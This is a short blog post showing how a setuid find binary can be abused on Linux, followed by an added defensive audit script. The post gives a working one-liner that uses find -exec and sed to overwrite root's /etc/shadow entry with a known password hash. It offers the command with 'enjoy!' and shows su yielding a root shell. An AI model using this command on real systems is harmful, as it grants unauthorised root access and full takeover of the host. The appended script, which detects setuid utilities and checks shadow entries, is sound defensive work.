Day 66: More Shenanigans with /etc/shadow — abusing find SETUID.
Mar 6, 2019
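Did you know that if find has the SETUID bit set, you can use it to replace the root password with a single command? Anything find launches through -exec inherits root's effective UID, so sed can edit /etc/shadow in place.
This snippet changes the password to 1234 (the pattern only matches when root's password field starts with *), enjoy!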
find . -exec sed -Ei 's/^(root\:)\*(.*)/\1\$6\$ZbvneNDSEXXO4pk1\$DmvtdGOHZA8mbpVih5xtHrBcKk8VxZ0rXwLEK2M1iciGvM6qHXfuSY5YosPHj3Zv063JUX2p1TQqya4k1Azjx0\2/' /etc/shadow \;
Now just su to root.
user@box:/$ su root
Password:
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)
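
A defender's check for the condition this post relies on, as an added example (not from the original post): it lists setuid copies of watchlisted utilities under a directory and reports whether an account's shadow entry is locked or holds a hash. The function names, the WATCHLIST contents and the sample data are assumptions made for illustration.

```shell
#!/bin/sh
# Added defensive example, not code from the original post.
# WATCHLIST is an assumed, site-specific list of utilities that can run other
# programs or edit files, and so should never carry the setuid bit.
WATCHLIST="find sed"

# Print each setuid regular file under directory $1 whose name is on WATCHLIST.
audit_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        case " $WATCHLIST " in
            *" $(basename "$path") "*) printf '%s\n' "$path" ;;
        esac
    done
}

# Classify account $2's password field in shadow-format file $1.
# locked = starts with * or !, empty = no password, hash = anything else.
shadow_state() {
    awk -F: -v user="$2" '
        $1 == user {
            found = 1
            if ($2 == "")          print "empty"
            else if ($2 ~ /^[*!]/) print "locked"
            else                   print "hash"
            exit
        }
        END { if (!found) print "missing" }' "$1"
}

# Constructed sample data: a scratch tree holding an empty setuid file named
# "find", and a shadow-format file whose root entry carries a placeholder hash.
demo=$(mktemp -d)
mkdir "$demo/bin"
: > "$demo/bin/find"; chmod 4755 "$demo/bin/find"
: > "$demo/bin/ls";   chmod 0755 "$demo/bin/ls"
printf 'root:$6$CONSTRUCTED$PLACEHOLDER:17961:0:99999:7:::\n' > "$demo/shadow"
audit_setuid "$demo/bin"
shadow_state "$demo/shadow" root
rm -rf "$demo"
```

On a real host, run audit_setuid against / as root and clear any hit with chmod u-s.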